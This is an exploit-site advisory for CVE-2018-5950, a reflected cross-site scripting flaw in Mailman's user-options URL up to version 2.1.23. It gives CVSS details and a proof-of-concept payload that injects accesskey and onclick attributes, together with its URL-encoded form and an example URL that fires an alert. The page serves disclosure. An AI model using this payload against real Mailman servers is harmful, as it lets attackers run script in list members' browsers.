Mailman 2.1.23 Cross Site Scripting

2020.10.29
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Title: Mailman 1.x > 2.1.23 - Cross Site Scripting (XSS) # Type: Reflected XSS # Software: Mailman # Version: >=1.x <= 2.1.23 # Vendor Homepage: https://www.list.org # Original link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5950 # POC Author: Valerio Alessandroni # Date: 28/10/2020 # Description: Cross-site scripting (XSS) vulnerability in the web UI in Mailman before 2.1.26 allows remote attackers to inject arbitrary web script or HTML via a user-options URL. # # https://127.0.0.1/cgi-bin/mailman/options/[LIST]/[EMAIL][XSS] # Which [LIST] is a valid list, [EMAIL] is a valid email and [XSS] is the payload # # For this POC I used the following payload # CVE: CVE-2018-5950 "accesskey%3d"x"onclick%3d"alert`XSS`" # Due the payload is loaded inside an HIDDEN INPUT TYPE, until today the only way to trigger the malicious code is via the accesskey attribute. # An URL Encoded version of the payload is %22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22 # URL Example: https://127.0.0.1/cgi-bin/mailman/options/list_name/test@test.com%22%61%63%63%65%73%73%6b%65%79%3d%22%78%22%6f%6e%63%6c%69%63%6b%3d%22%61%6c%65%72%74%60%58%53%53%60%22 # In order to trigger the alert, the victim has to press the following buttons ALT+SHIFT+X # where X is an arbitrary button inserted as accesskey attribute in the payload.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top